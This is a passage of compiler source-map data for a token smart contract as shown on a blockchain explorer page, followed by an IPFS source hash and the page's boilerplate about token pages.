;;;;;;;;:::i;:::-;;;;;;;;;13581:57;13587:5;13594:7;13622:15;13603:16;:34;13581:5;:57::i;:::-;13669:4;13662:11;;;;13248:433;;;;:::o;10301:193::-;10380:4;10397:13;10413:12;:10;:12::i;:::-;10397:28;;10436;10446:5;10453:2;10457:6;10436:9;:28::i;:::-;10482:4;10475:11;;;10301:193;;;;:::o;24813:42::-;;;;;;;;;;;;;;;;;:::o;7901:44::-;;;;;;;;;;;;;;;;;:::o;10557:151::-;10646:7;10673:11;:18;10685:5;10673:18;;;;;;;;;;;;;;;:27;10692:7;10673:27;;;;;;;;;;;;;;;;10666:34;;10557:151;;;;:::o;2776:192::-;2107:12;:10;:12::i;:::-;2096:23;;:7;:5;:7::i;:::-;:23;;;2088:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;2885:1:::1;2865:22;;:8;:22;;;;2857:73;;;;;;;;;;;;:::i;:::-;;;;;;;;;2941:19;2951:8;2941:9;:19::i;:::-;2776:192:::0;:::o;695:98::-;748:7;775:10;768:17;;695:98;:::o;16441:377::-;16591:1;16574:19;;:5;:19;;;;16566:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;16672:1;16653:21;;:7;:21;;;;16645:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;16756:6;16726:11;:18;16738:5;16726:18;;;;;;;;;;;;;;;:27;16745:7;16726:27;;;;;;;;;;;;;;;:36;;;;16794:7;16778:32;;16787:5;16778:32;;;16803:6;16778:32;;;;;;:::i;:::-;;;;;;;;16441:377;;;:::o;17109:450::-;17244:24;17271:25;17281:5;17288:7;17271:9;:25::i;:::-;17244:52;;17331:17;17311:16;:37;17307:245;;17393:6;17373:16;:26;;17365:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;17477:48;17483:5;17490:7;17518:6;17499:16;:25;17477:5;:48::i;:::-;17307:245;17233:326;17109:450;;;:::o;24864:750::-;25030:1;25006:8;:20;25015:10;25006:20;;;;;;;;;;;;;;;;:25;:51;;;;;25047:10;25035:22;;:8;;;;;;;;;;;:22;;;;25006:51;25002:180;;;25100:1;25078:7;:19;25086:10;25078:19;;;;;;;;;;;;;;;;:23;25074:97;;;25146:9;;25122:8;:20;25131:10;25122:20;;;;;;;;;;;;;;;;:33;;;;;;;:::i;:::-;;;;;;;;25074:97;25002:180;25194:15;25212:5;;;;;;;;;;;25194:23;;25236:7;25228:5;;:15;;;;;;;;;;;;;;;;;;25274:9;;25254:7;:16;25262:7;25254:16;;;;;;;;;;;;;;;;:29;;;;;;;:::i;:::-;;;;;;;;25324:1;25300:8;:20;25309:10;25300:20;;;;;;;;;;;;;;;;:25;25296:92;;;25367:9;25342;:21;25352:10;25342:21;;;;;;;;;;;;;;;;:34;;;;;;;:::i;:::-;;;;;;;;25296:92;25400:16;25431:9;;25419;:21;;;;:::i;:::-;25400:40;;25473:3;25462:8;:14;;;;:::i;:::-;25451:25;;25500:8;25487:21;;;;;:::i;:::-;;;25541:9;25519;:18;25529:7;25519:18;;;;;;;;;;;;;;;;:31;;;;;;;:::i;:::-;;;;;;;;25587:7;25566:40;;25575:10;25566:40;;;25596:9;25566:40;;;;;;:::i;:::-;;;;;;;;24991:623;;24864:750;;;:::o;2976:173::-;3032:16;3051:6;;;;;;;;;;;3032:25;;3077:8;3068:6;;:17;;;;;;;;;;;;;;;;;;3132:8;3101:40;;3122:8;3101:40;;;;;;;;;;;;3021:128;2976:173;:::o;7:77:1:-;44:7;73:5;62:16;;7:77;;;:::o;90:118::-;177:24;195:5;177:24;:::i;:::-;172:3;165:37;90:118;;:::o;214:222::-;307:4;345:2;334:9;330:18;322:26;;358:71;426:1;415:9;411:17;402:6;358:71;:::i;:::-;214:222;;;;:::o;442:99::-;494:6;528:5;522:12;512:22;;442:99;;;:::o;547:169::-;631:11;665:6;660:3;653:19;705:4;700:3;696:14;681:29;;547:169;;;;:::o;722:307::-;790:1;800:113;814:6;811:1;808:13;800:113;;;899:1;894:3;890:11;884:18;880:1;875:3;871:11;864:39;836:2;833:1;829:10;824:15;;800:113;;;931:6;928:1;925:13;922:101;;;1011:1;1002:6;997:3;993:16;986:27;922:101;771:258;722:307;;;:::o;1035:102::-;1076:6;1127:2;1123:7;1118:2;1111:5;1107:14;1103:28;1093:38;;1035:102;;;:::o;1143:364::-;1231:3;1259:39;1292:5;1259:39;:::i;:::-;1314:71;1378:6;1373:3;1314:71;:::i;:::-;1307:78;;1394:52;1439:6;1434:3;1427:4;1420:5;1416:16;1394:52;:::i;:::-;1471:29;1493:6;1471:29;:::i;:::-;1466:3;1462:39;1455:46;;1235:272;1143:364;;;;:::o;1513:313::-;1626:4;1664:2;1653:9;1649:18;1641:26;;1713:9;1707:4;1703:20;1699:1;1688:9;1684:17;1677:47;1741:78;1814:4;1805:6;1741:78;:::i;:::-;1733:86;;1513:313;;;;:::o;1913:117::-;2022:1;2019;2012:12;2159:126;2196:7;2236:42;2229:5;2225:54;2214:65;;2159:126;;;:::o;2291:96::-;2328:7;2357:24;2375:5;2357:24;:::i;:::-;2346:35;;2291:96;;;:::o;2393:122::-;2466:24;2484:5;2466:24;:::i;:::-;2459:5;2456:35;2446:63;;2505:1;2502;2495:12;2446:63;2393:122;:::o;2521:139::-;2567:5;2605:6;2592:20;2583:29;;2621:33;2648:5;2621:33;:::i;:::-;2521:139;;;;:::o;2666:122::-;2739:24;2757:5;2739:24;:::i;:::-;2732:5;2729:35;2719:63;;2778:1;2775;2768:12;2719:63;2666:122;:::o;2794:139::-;2840:5;2878:6;2865:20;2856:29;;2894:33;2921:5;2894:33;:::i;:::-;2794:139;;;;:::o;2939:474::-;3007:6;3015;3064:2;3052:9;3043:7;3039:23;3035:32;3032:119;;;3070:79;;:::i;:::-;3032:119;3190:1;3215:53;3260:7;3251:6;3240:9;3236:22;3215:53;:::i;:::-;3205:63;;3161:117;3317:2;3343:53;3388:7;3379:6;3368:9;3364:22;3343:53;:::i;:::-;3333:63;;3288:118;2939:474;;;;;:::o;3419:90::-;3453:7;3496:5;3489:13;3482:21;3471:32;;3419:90;;;:::o;3515:109::-;3596:21;3611:5;3596:21;:::i;:::-;3591:3;3584:34;3515:109;;:::o;3630:210::-;3717:4;3755:2;3744:9;3740:18;3732:26;;3768:65;3830:1;3819:9;3815:17;3806:6;3768:65;:::i;:::-;3630:210;;;;:::o;3846:118::-;3933:24;3951:5;3933:24;:::i;:::-;3928:3;3921:37;3846:118;;:::o;3970:222::-;4063:4;4101:2;4090:9;4086:18;4078:26;;4114:71;4182:1;4171:9;4167:17;4158:6;4114:71;:::i;:::-;3970:222;;;;:::o;4198:60::-;4226:3;4247:5;4240:12;;4198:60;;;:::o;4264:142::-;4314:9;4347:53;4365:34;4374:24;4392:5;4374:24;:::i;:::-;4365:34;:::i;:::-;4347:53;:::i;:::-;4334:66;;4264:142;;;:::o;4412:126::-;4462:9;4495:37;4526:5;4495:37;:::i;:::-;4482:50;;4412:126;;;:::o;4544:153::-;4621:9;4654:37;4685:5;4654:37;:::i;:::-;4641:50;;4544:153;;;:::o;4703:185::-;4817:64;4875:5;4817:64;:::i;:::-;4812:3;4805:77;4703:185;;:::o;4894:276::-;5014:4;5052:2;5041:9;5037:18;5029:26;;5065:98;5160:1;5149:9;5145:17;5136:6;5065:98;:::i;:::-;4894:276;;;;:::o;5176:619::-;5253:6;5261;5269;5318:2;5306:9;5297:7;5293:23;5289:32;5286:119;;;5324:79;;:::i;:::-;5286:119;5444:1;5469:53;5514:7;5505:6;5494:9;5490:22;5469:53;:::i;:::-;5459:63;;5415:117;5571:2;5597:53;5642:7;5633:6;5622:9;5618:22;5597:53;:::i;:::-;5587:63;;5542:118;5699:2;5725:53;5770:7;5761:6;5750:9;5746:22;5725:53;:::i;:::-;5715:63;;5670:118;5176:619;;;;;:::o;5801:86::-;5836:7;5876:4;5869:5;5865:16;5854:27;;5801:86;;;:::o;5893:112::-;5976:22;5992:5;5976:22;:::i;:::-;5971:3;5964:35;5893:112;;:::o;6011:214::-;6100:4;6138:2;6127:9;6123:18;6115:26;;6151:67;6215:1;6204:9;6200:17;6191:6;6151:67;:::i;:::-;6011:214;;;;:::o;6231:329::-;6290:6;6339:2;6327:9;6318:7;6314:23;6310:32;6307:119;;;6345:79;;:::i;:::-;6307:119;6465:1;6490:53;6535:7;6526:6;6515:9;6511:22;6490:53;:::i;:::-;6480:63;;6436:117;6231:329;;;;:::o;6566:474::-;6634:6;6642;6691:2;6679:9;6670:7;6666:23;6662:32;6659:119;;;6697:79;;:::i;:::-;6659:119;6817:1;6842:53;6887:7;6878:6;6867:9;6863:22;6842:53;:::i;:::-;6832:63;;6788:117;6944:2;6970:53;7015:7;7006:6;6995:9;6991:22;6970:53;:::i;:::-;6960:63;;6915:118;6566:474;;;;;:::o;7046:180::-;7094:77;7091:1;7084:88;7191:4;7188:1;7181:15;7215:4;7212:1;7205:15;7232:320;7276:6;7313:1;7307:4;7303:12;7293:22;;7360:1;7354:4;7350:12;7381:18;7371:81;;7437:4;7429:6;7425:17;7415:27;;7371:81;7499:2;7491:6;7488:14;7468:18;7465:38;7462:84;;;7518:18;;:::i;:::-;7462:84;7283:269;7232:320;;;:::o;7558:180::-;7606:77;7603:1;7596:88;7703:4;7700:1;7693:15;7727:4;7724:1;7717:15;7744:305;7784:3;7803:20;7821:1;7803:20;:::i;:::-;7798:25;;7837:20;7855:1;7837:20;:::i;:::-;7832:25;;7991:1;7923:66;7919:74;7916:1;7913:81;7910:107;;;7997:18;;:::i;:::-;7910:107;8041:1;8038;8034:9;8027:16;;7744:305;;;;:::o;8055:182::-;8195:34;8191:1;8183:6;8179:14;8172:58;8055:182;:::o;8243:366::-;8385:3;8406:67;8470:2;8465:3;8406:67;:::i;:::-;8399:74;;8482:93;8571:3;8482:93;:::i;:::-;8600:2;8595:3;8591:12;8584:19;;8243:366;;;:::o;8615:419::-;8781:4;8819:2;8808:9;8804:18;8796:26;;8868:9;8862:4;8858:20;8854:1;8843:9;8839:17;8832:47;8896:131;9022:4;8896:131;:::i;:::-;8888:139;;8615:419;;;:::o;9040:224::-;9180:34;9176:1;9168:6;9164:14;9157:58;9249:7;9244:2;9236:6;9232:15;9225:32;9040:224;:::o;9270:366::-;9412:3;9433:67;9497:2;9492:3;9433:67;:::i;:::-;9426:74;;9509:93;9598:3;9509:93;:::i;:::-;9627:2;9622:3;9618:12;9611:19;;9270:366;;;:::o;9642:419::-;9808:4;9846:2;9835:9;9831:18;9823:26;;9895:9;9889:4;9885:20;9881:1;9870:9;9866:17;9859:47;9923:131;10049:4;9923:131;:::i;:::-;9915:139;;9642:419;;;:::o;10067:225::-;10207:34;10203:1;10195:6;10191:14;10184:58;10276:8;10271:2;10263:6;10259:15;10252:33;10067:225;:::o;10298:366::-;10440:3;10461:67;10525:2;10520:3;10461:67;:::i;:::-;10454:74;;10537:93;10626:3;10537:93;:::i;:::-;10655:2;10650:3;10646:12;10639:19;;10298:366;;;:::o;10670:419::-;10836:4;10874:2;10863:9;10859:18;10851:26;;10923:9;10917:4;10913:20;10909:1;10898:9;10894:17;10887:47;10951:131;11077:4;10951:131;:::i;:::-;10943:139;;10670:419;;;:::o;11095:223::-;11235:34;11231:1;11223:6;11219:14;11212:58;11304:6;11299:2;11291:6;11287:15;11280:31;11095:223;:::o;11324:366::-;11466:3;11487:67;11551:2;11546:3;11487:67;:::i;:::-;11480:74;;11563:93;11652:3;11563:93;:::i;:::-;11681:2;11676:3;11672:12;11665:19;;11324:366;;;:::o;11696:419::-;11862:4;11900:2;11889:9;11885:18;11877:26;;11949:9;11943:4;11939:20;11935:1;11924:9;11920:17;11913:47;11977:131;12103:4;11977:131;:::i;:::-;11969:139;;11696:419;;;:::o;12121:221::-;12261:34;12257:1;12249:6;12245:14;12238:58;12330:4;12325:2;12317:6;12313:15;12306:29;12121:221;:::o;12348:366::-;12490:3;12511:67;12575:2;12570:3;12511:67;:::i;:::-;12504:74;;12587:93;12676:3;12587:93;:::i;:::-;12705:2;12700:3;12696:12;12689:19;;12348:366;;;:::o;12720:419::-;12886:4;12924:2;12913:9;12909:18;12901:26;;12973:9;12967:4;12963:20;12959:1;12948:9;12944:17;12937:47;13001:131;13127:4;13001:131;:::i;:::-;12993:139;;12720:419;;;:::o;13145:179::-;13285:31;13281:1;13273:6;13269:14;13262:55;13145:179;:::o;13330:366::-;13472:3;13493:67;13557:2;13552:3;13493:67;:::i;:::-;13486:74;;13569:93;13658:3;13569:93;:::i;:::-;13687:2;13682:3;13678:12;13671:19;;13330:366;;;:::o;13702:419::-;13868:4;13906:2;13895:9;13891:18;13883:26;;13955:9;13949:4;13945:20;13941:1;13930:9;13926:17;13919:47;13983:131;14109:4;13983:131;:::i;:::-;13975:139;;13702:419;;;:::o;14127:191::-;14167:4;14187:20;14205:1;14187:20;:::i;:::-;14182:25;;14221:20;14239:1;14221:20;:::i;:::-;14216:25;;14260:1;14257;14254:8;14251:34;;;14265:18;;:::i;:::-;14251:34;14310:1;14307;14303:9;14295:17;;14127:191;;;;:::o;14324:348::-;14364:7;14387:20;14405:1;14387:20;:::i;:::-;14382:25;;14421:20;14439:1;14421:20;:::i;:::-;14416:25;;14609:1;14541:66;14537:74;14534:1;14531:81;14526:1;14519:9;14512:17;14508:105;14505:131;;;14616:18;;:::i;:::-;14505:131;14664:1;14661;14657:9;14646:20;;14324:348;;;;:::o;14678:180::-;14726:77;14723:1;14716:88;14823:4;14820:1;14813:15;14847:4;14844:1;14837:15;14864:185;14904:1;14921:20;14939:1;14921:20;:::i;:::-;14916:25;;14955:20;14973:1;14955:20;:::i;:::-;14950:25;;14994:1;14984:35;;14999:18;;:::i;:::-;14984:35;15041:1;15038;15034:9;15029:14;;14864:185;;;;:::o

Swarm Source

ipfs://8f40da3883d6adde1598bdc53758456f15363981762a55f8a0d633345da7f53c
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.